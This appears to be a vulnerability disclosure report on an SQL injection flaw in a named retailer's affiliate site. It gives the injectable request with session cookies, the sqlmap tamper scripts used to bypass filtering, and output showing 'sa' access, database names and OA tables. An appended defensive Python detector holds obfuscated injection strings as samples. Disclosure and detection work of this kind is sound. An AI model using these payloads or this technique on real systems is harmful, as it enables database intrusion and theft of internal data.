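2015-12-16: Details reported to the vendor; awaiting vendor handling.
2015-12-18: Vendor confirmed; details disclosed to the vendor only.
2015-12-25: Vendor fixed the vulnerability and disclosed it proactively; details released to the public.

The site cps.gome.com.cn has more than 600 database tables, and cross-database queries can read the OA system's data; with sa privileges, directories can be listed directly.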
GET /Cps/News/IndexShow?NoticeName= HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://cps.gome.com.cn/Cps/News/IndexShow
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Host: cps.gome.com.cn
Cookie: BIGipServerpool_cps=2033334794.20480.0000; topNewsPopup=0; newsListPopup=0; JSESSIONID=pgMdWxvR1JJvK2Xbw6ZlZbCpGLQmDJxzd2PbT9Wk1G2Fs39z2R9s!2018110695; uid=CjozJlZxIpEwFoB2AwUAAg==; DSESSIONID=370dfcf6f7f1456083ddd554757a848a
Accept-Encoding: gzip, deflate

The between and space2comment tamper scripts were used to bypass the simple filtering.

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[19:53:13] [INFO] fetching current user
[19:53:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:53:13] [INFO] retrieved:
[19:53:13] [WARNING] reflective value(s) found and filtering out
sa
current user: 'sa'
[19:53:17] [INFO] fetched data logged to text files under './output/cps.gome.com.cn'
[*] shutting down at 19:53:17

[19:54:29] [WARNING] reflective value(s) found and filtering out
Current directory: D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\ERRORLOG

[19:56:36] [INFO] testing if current user is DBA
available databases [21]:
[*] AdvertisementPromotion
[*] CollegeUnion
[*] distribution
[*] FenxiangbaoCommunity
[*] GomeCps
[*] GomeCPSClick
[*] GomeFXBao
[*] GomeOA
[*] GomeRecharge
[*] GomeVenues
[*] GomeWeiXinMall
[*] master
[*] model
[*] msdb
[*] NationalBak
[*] NationalUnion20140717
[*] NationalUnionHistory
[*] ProjectStatusLog
[*] TaskPlatform
[*] tempdb
[*] ZzzLinShi

OA system:

Database: GomeOA
[20 tables]
+-------------------+
| BodyEffect        |
| BodyOccur         |
| Bugs              |
| DaShuJu           |
| DaShuJuName       |
| Daily             |
| FxbDailySitePlat  |
| OccurDailyShop    |
| OccurDailyShopSid |
| OccurDailySid     |
| OccurProEffect    |
| Project           |
| ProjectBackUp     |
| ProjectFile       |
| QuanOrder         |
| ReceiveProEffect  |
| Task              |
| User              |
| UserDate          |
| Word              |
+-------------------+
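
The report notes that the between and space2comment tamper scripts got past the site's simple filtering. The following is an added example, not part of the original report: a log-review heuristic that strips inline comments before matching, so comment-separated boolean tests on NoticeName are flagged where a whitespace-keyword filter misses them. The NAIVE pattern is a hypothetical stand-in for the site's filter (the report does not describe it), and the sample query strings are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed query strings for the NoticeName parameter (not from the report).
SAMPLES = [
    "NoticeName=holiday+schedule",
    "NoticeName=prices+between+100+and+200",
    "NoticeName=x'/**/AND/**/5/**/BETWEEN/**/5/**/AND/**/5--",
    "NoticeName=x%27%2F%2A%2A%2FOR%2F%2A%2A%2F1%2F%2A%2A%2FNOT%2F%2A%2A%2F"
    "BETWEEN%2F%2A%2A%2F0%2F%2A%2A%2FAND%2F%2A%2A%2F0--",
]

# Hypothetical "simple filter": whitespace-delimited keywords and comparison operators.
NAIVE = re.compile(r"\s(?:and|or|select|union)\s|[=<>]", re.I)
# Quote break-out followed by a boolean test written with BETWEEN.
BOOLEAN_BETWEEN = re.compile(r"'\s*(?:and|or)\b.*?\bbetween\b.*?\band\b")
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def param(query_string, name="NoticeName"):
    """Return the URL-decoded value of one parameter ('' if absent)."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def normalize(value):
    """Undo comment-as-space obfuscation: comments -> space, collapse, lowercase."""
    value = INLINE_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def naive_blocks(query_string):
    """What the hypothetical keyword filter would reject."""
    return bool(NAIVE.search(param(query_string)))


def flagged(query_string):
    """Heuristic run on the normalized value; a hit is a triage signal."""
    return bool(BOOLEAN_BETWEEN.search(normalize(param(query_string))))


if __name__ == "__main__":
    for qs in SAMPLES:
        print(f"naive={naive_blocks(qs)!s:5} normalized={flagged(qs)!s:5} {qs[:60]}")
```

The keyword filter rejects the benign second sample and passes both obfuscated ones, while the normalized check does the opposite. A match is only a signal for log review; it does not replace parameterized queries and a database login without sa rights.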
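Severity: High
Vulnerability Rank: 18
Confirmation time: 2015-12-18 10:12
Thank you for the information you provided.
2015-12-25: The vulnerability has been fixed. Thank you for the report.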